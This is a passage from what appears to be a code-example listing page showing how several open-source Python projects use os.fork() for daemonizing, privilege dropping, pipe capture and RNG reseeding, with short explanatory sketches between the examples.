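    class Daemon(object):
        """Minimal container for the attributes daemonize() above relies on."""

        def __init__(self, pidfile, stdin=os.devnull,
                     stdout=os.devnull, stderr=os.devnull):
            self.pidfile = pidfile
            self.stdin, self.stdout, self.stderr = stdin, stdout, stderr

        def delpid(self):
            # atexit hook registered by daemonize(): remove the stale pidfile.
            if os.path.exists(self.pidfile):
                os.remove(self.pidfile)
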
Example 73
Project: certidude   Author: laurivosandi   File: authority.py    MIT License 4 votes vote down vote up
def self_enroll(skip_notify=False):
    assert os.getuid() == 0 and os.getgid() == 0, "Can self-enroll only as root"

    from certidude import const, config
    common_name = const.FQDN
    os.umask(0o0177)

    try:
        path, buf, cert, signed, expires = get_signed(common_name)
        self_public_key = asymmetric.load_public_key(path)
        private_key = asymmetric.load_private_key(config.SELF_KEY_PATH)
    except FileNotFoundError: # certificate or private key not found
        click.echo("Generating private key for frontend: %s" % config.SELF_KEY_PATH)
        with open(config.SELF_KEY_PATH, 'wb') as fh:
            if public_key.algorithm == "ec":
                self_public_key, private_key = asymmetric.generate_pair("ec", curve=public_key.curve)
            elif public_key.algorithm == "rsa":
                self_public_key, private_key = asymmetric.generate_pair("rsa", bit_size=public_key.bit_size)
            else:
                raise NotImplementedError("CA certificate public key algorithm %s not supported" % public_key.algorithm)
            fh.write(asymmetric.dump_private_key(private_key, None))
    else:
        now = datetime.utcnow()
        if now + timedelta(days=1) < expires:
            click.echo("Certificate %s still valid, delete to self-enroll again" % path)
            return

    builder = CSRBuilder({"common_name": common_name}, self_public_key)
    request = builder.build(private_key)
    pid = os.fork()
    if not pid:
        from certidude import authority, config
        from certidude.common import drop_privileges
        drop_privileges()
        assert os.getuid() != 0 and os.getgid() != 0
        path = os.path.join(config.REQUESTS_DIR, common_name + ".pem")
        click.echo("Writing certificate signing request for frontend: %s" % path)
        with open(path, "wb") as fh:
            fh.write(pem_armor_csr(request)) # Write CSR with certidude permissions
        authority.sign(common_name, skip_notify=skip_notify, skip_push=True, overwrite=True, profile=config.PROFILES["srv"])
        click.echo("Frontend certificate signed")
        sys.exit(0)
    else:
        os.waitpid(pid, 0)
        os.system("systemctl reload nginx") 
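
The generic shape of the pattern above, with the certidude-specific details removed ('nobody' is a hypothetical target user):

    import os
    import pwd

    pid = os.fork()
    if not pid:
        # Child: drop root before doing the work. Drop the group first;
        # once setuid() succeeds, setgid() would no longer be permitted.
        entry = pwd.getpwnam('nobody')  # hypothetical target user
        os.setgid(entry.pw_gid)
        os.setuid(entry.pw_uid)
        # ... unprivileged work goes here ...
        os._exit(0)
    else:
        # Parent: stay privileged and wait for the child to finish.
        os.waitpid(pid, 0)
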
Example 74
Project: certidude   Author: laurivosandi   File: cli.py    MIT License 4 votes vote down vote up
def certidude_serve(fork):
    from certidude import const, push, config
    click.echo("Using configuration from: %s" % const.SERVER_CONFIG_PATH)
    click.echo("SCEP subnets: %s" % config.SCEP_SUBNETS)
    click.echo("Loading signature profiles:")
    for profile in config.PROFILES.values():
         click.echo("- %s" % profile)
    click.echo()

    click.echo("Users subnets: %s" %
        ", ".join([str(j) for j in config.USER_SUBNETS]))
    click.echo("Administrative subnets: %s" %
        ", ".join([str(j) for j in config.ADMIN_SUBNETS]))
    click.echo("Auto-sign enabled for following subnets: %s" %
        ", ".join([str(j) for j in config.AUTOSIGN_SUBNETS]))
    click.echo("Request submissions allowed from following subnets: %s" %
        ", ".join([str(j) for j in config.REQUEST_SUBNETS]))

    from certidude.api import ReadWriteApp, BuilderApp, ResponderApp, RevocationListApp, LogApp

    if not fork or not os.fork():
        pid = os.getpid()
        with open(const.SERVER_PID_PATH, "w") as pidfile:
            pidfile.write("%d\n" % pid)

        # Rebuild reverse mapping
        from certidude import authority
        for cn, path, buf, cert, signed, expires in authority.list_signed():
            by_serial = os.path.join(config.SIGNED_BY_SERIAL_DIR, "%040x.pem" % cert.serial_number)
            if not os.path.exists(by_serial):
                click.echo("Linking %s to ../%s.pem" % (by_serial, cn))
                os.symlink("../%s.pem" % cn, by_serial)

        push.publish("server-started")
        logger.debug("Started Certidude at %s", const.FQDN)

        if fork and config.OCSP_SUBNETS:
            click.echo("OCSP responder subnets: %s" % config.OCSP_SUBNETS)
            if ResponderApp().fork():
                return
        if fork and config.CRL_SUBNETS:
            click.echo("CRL subnets: %s" % config.CRL_SUBNETS)
            if RevocationListApp().fork():
                return
        if fork:
            if BuilderApp().fork():
                return
        if fork and config.LOGGING_BACKEND == "sql":
            if LogApp().fork():
                return

        ReadWriteApp().run()
        push.publish("server-stopped")
        logger.debug("Shutting down Certidude API backend")
        return 
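
The exact return semantics of the App.fork() methods aren't shown here; a generic sketch of the fork-per-subservice idea they suggest (hypothetical fork_app helper):

    import os

    def fork_app(run):
        # Parent gets the child's PID back (truthy) and moves on to start
        # the next app; the child enters the service loop and never returns.
        pid = os.fork()
        if pid:
            return pid
        run()
        os._exit(0)
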
Example 75
Project: Repobot   Author: Desgard   File: test__UserFriendlyRNG.py    MIT License 4 votes vote down vote up
def runTest(self):
        # Regression test for CVE-2013-1445.  We had a bug where, under the
        # right conditions, two processes might see the same random sequence.

        if sys.platform.startswith('win'):  # windows can't fork
            assert not hasattr(os, 'fork')    # ... right?
            return

        # Wait 150 ms so that we don't trigger the rate-limit prematurely.
        time.sleep(0.15)

        reseed_count_before = self._get_reseed_count()

        # One or both of these calls together should trigger a reseed right here.
        Crypto.Random._UserFriendlyRNG._get_singleton().reinit()
        Crypto.Random.get_random_bytes(1)

        reseed_count_after = self._get_reseed_count()
        self.assertNotEqual(reseed_count_before, reseed_count_after)  # sanity check: test should reseed parent before forking

        rfiles = []
        for i in range(10):
            rfd, wfd = os.pipe()
            if os.fork() == 0:
                # child
                os.close(rfd)
                f = os.fdopen(wfd, "wb")

                Crypto.Random.atfork()

                data = Crypto.Random.get_random_bytes(16)

                f.write(data)
                f.close()
                os._exit(0)
            # parent
            os.close(wfd)
            rfiles.append(os.fdopen(rfd, "rb"))

        results = []
        results_dict = {}
        for f in rfiles:
            data = binascii.hexlify(f.read())
            results.append(data)
            results_dict[data] = 1
            f.close()

        if len(results) != len(list(results_dict.keys())):
            raise AssertionError("RNG output duplicated across fork():\n%s" %
                                 (pprint.pformat(results)))


# For RNGMultiprocessingForkTest 
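
The same fork hazard exists for the standard library's random module; a small illustration (unrelated to PyCrypto):

    import os
    import random

    pid = os.fork()
    if pid == 0:
        # Child: reseed, otherwise both processes continue the parent's
        # Mersenne Twister sequence and draw identical numbers.
        random.seed(os.urandom(16))
        print('child draw:', random.random())
        os._exit(0)
    else:
        os.waitpid(pid, 0)
        print('parent draw:', random.random())
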
Example 76
Project: wok   Author: bbglab   File: monproc.py    GNU General Public License v3.0 4 votes vote down vote up
def call(cmd, env = None, shell = False, stats = None, interval = 10, logout = False, logerr = False, logtimestamp = False, name = ""):

	if logout:
		r, w = os.pipe()
		outr = os.fdopen(r, "r")
		outw = os.fdopen(w, "w")
	else:
		outw = sys.stdout

	if logerr:
		r, w = os.pipe()
		errr = os.fdopen(r, "r")
		errw = os.fdopen(w, "w")
	else:
		errw = sys.stderr

	pid = os.fork()
	if pid == 0:
		__run_child(cmd, env, outw, errw)

	if stats is not None:
		pool = mp.Pool(1)
		max_mem = pool.apply_async(__monproc, (pid, stats, interval, ))

	if logout:
		outp = mp.Process(name = "%s-logout" % name, target = __logproc, args = (pid, outr, sys.stdout, logtimestamp))
		outp.start()

	if logerr:
		errp = mp.Process(name = "%s-logerr" % name, target = __logproc, args = (pid, errr, sys.stderr, logtimestamp))
		errp.start()

	exit_code = os.waitpid(pid, 0)[1] >> 8

	stats_results = {}

	if stats is not None:
		mem = max_mem.get()
		stats_results["max_vms"] = mem[0]
		stats_results["max_rss"] = mem[1]
		stats_results["max_vms_h"] = __hmem(mem[0])
		stats_results["max_rss_h"] = __hmem(mem[1])

	if logout:
		outp.terminate()
		outp.join()

	if logerr:
		errp.terminate()
		errp.join()

	return (exit_code, stats_results) 
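
The pipe plumbing in call() above, stripped to a minimal parent-captures-child-stdout sketch:

    import os

    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:
        # Child: route stdout into the pipe's write end.
        os.close(r)
        os.dup2(w, 1)
        os.write(1, b'from child\n')
        os._exit(0)

    # Parent: keep only the read end; EOF arrives when the child exits.
    os.close(w)
    with os.fdopen(r, 'rb') as f:
        print(f.read())
    os.waitpid(pid, 0)
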
Example 77
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def _background(pidfile, stdin='/dev/null', stdout='/dev/null',
                stderr='/dev/null'):  # pragma: no cover
    """Fork the current process into a background daemon.

    :param pidfile: file to write PID of daemon process to.
    :type pidfile: filepath
    :param stdin: where to read input
    :type stdin: filepath
    :param stdout: where to write stdout output
    :type stdout: filepath
    :param stderr: where to write stderr output
    :type stderr: filepath

    """
    def _fork_and_exit_parent(errmsg, wait=False, write=False):
        try:
            pid = os.fork()
            if pid > 0:
                if write:  # write PID of child process to `pidfile`
                    tmp = pidfile + '.tmp'
                    with open(tmp, 'wb') as fp:
                        fp.write(str(pid))
                    os.rename(tmp, pidfile)
                if wait:  # wait for child process to exit
                    os.waitpid(pid, 0)
                os._exit(0)
        except OSError as err:
            _log().critical('%s: (%d) %s', errmsg, err.errno, err.strerror)
            raise err

    # Do first fork and wait for second fork to finish.
    _fork_and_exit_parent('fork #1 failed', wait=True)

    # Decouple from parent environment.
    os.chdir(wf().workflowdir)
    os.setsid()

    # Do second fork and write PID to pidfile.
    _fork_and_exit_parent('fork #2 failed', write=True)

    # Now I am a daemon!
    # Redirect standard file descriptors.
    si = open(stdin, 'r', 0)
    so = open(stdout, 'a+', 0)
    se = open(stderr, 'a+', 0)
    if hasattr(sys.stdin, 'fileno'):
        os.dup2(si.fileno(), sys.stdin.fileno())
    if hasattr(sys.stdout, 'fileno'):
        os.dup2(so.fileno(), sys.stdout.fileno())
    if hasattr(sys.stderr, 'fileno'):
        os.dup2(se.fileno(), sys.stderr.fileno()) 
Example 78
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def run_in_background(name, args, **kwargs):
    r"""Cache arguments then call this script again via :func:`subprocess.call`.

    :param name: name of job
    :type name: unicode
    :param args: arguments passed as first argument to :func:`subprocess.call`
    :param \**kwargs: keyword arguments to :func:`subprocess.call`
    :returns: exit code of sub-process
    :rtype: int

    When you call this function, it caches its arguments and then calls
    ``background.py`` in a subprocess. The Python subprocess will load the
    cached arguments, fork into the background, and then run the command you
    specified.

    This function will return as soon as the ``background.py`` subprocess has
    forked, returning the exit code of *that* process (i.e. not of the command
    you're trying to run).

    If that process fails, an error will be written to the log file.

    If a process is already running under the same name, this function will
    return immediately and will not run the specified command.

    """
    if is_running(name):
        _log().info('[%s] job already running', name)
        return

    argcache = _arg_cache(name)

    # Cache arguments
    with open(argcache, 'wb') as fp:
        pickle.dump({'args': args, 'kwargs': kwargs}, fp)
        _log().debug('[%s] command cached: %s', name, argcache)

    # Call this script
    cmd = ['/usr/bin/python', __file__, name]
    _log().debug('[%s] passing job to background runner: %r', name, cmd)
    retcode = subprocess.call(cmd)

    if retcode:  # pragma: no cover
        _log().error('[%s] background runner failed with %d', name, retcode)
    else:
        _log().debug('[%s] background job started', name)

    return retcode 
Example 79
Project: gist-alfred   Author: danielecook   File: background.py    MIT License 4 votes vote down vote up
def main(wf):  # pragma: no cover
    """Run command in a background process.

    Load cached arguments, fork into background, then call
    :meth:`subprocess.call` with cached arguments.

    """
    log = wf.logger
    name = wf.args[0]
    argcache = _arg_cache(name)
    if not os.path.exists(argcache):
        msg = '[{0}] command cache not found: {1}'.format(name, argcache)
        log.critical(msg)
        raise IOError(msg)

    # Fork to background and run command
    pidfile = _pid_file(name)
    _background(pidfile)

    # Load cached arguments
    with open(argcache, 'rb') as fp:
        data = pickle.load(fp)

    # Cached arguments
    args = data['args']
    kwargs = data['kwargs']

    # Delete argument cache file
    os.unlink(argcache)

    try:
        # Run the command
        log.debug('[%s] running command: %r', name, args)

        retcode = subprocess.call(args, **kwargs)

        if retcode:
            log.error('[%s] command failed with status %d', name, retcode)
    finally:
        os.unlink(pidfile)

    log.debug('[%s] job complete', name) 
Example 80
Project: hk-news-scrapper   Author: code4hk   File: daemon.py    MIT License 4 votes vote down vote up
def daemonize(self):
        """Daemonize class. UNIX double fork mechanism."""

        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError as err:
            sys.stderr.write('fork #1 failed: {0}\n'.format(err))
            sys.exit(1)

        # decouple from parent environment
        os.chdir('/')
        os.setsid()
        os.umask(0)

        # do second fork
        try:
            pid = os.fork()
            if pid > 0:
                # exit from second parent
                sys.exit(0)
        except OSError as err:
            sys.stderr.write('fork #2 failed: {0}\n'.format(err))
            sys.exit(1)

        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = open(os.devnull, 'r')
        so = open(os.devnull, 'a+')
        se = open(os.devnull, 'a+')

        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())

        # write pid file
        atexit.register(self.del_pid)

        pid = str(os.getpid())
        with open(self.pid_file, 'w+') as f:
            f.write(pid + '\n')
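
A hypothetical companion check for the pidfile written above; signal 0 tests for liveness without disturbing the daemon:

    import os

    def daemon_alive(pid_file):
        # Signal 0 performs permission and existence checks without
        # actually delivering a signal to the daemon.
        try:
            with open(pid_file) as f:
                pid = int(f.read().strip())
            os.kill(pid, 0)
        except (OSError, IOError, ValueError):
            return False
        return True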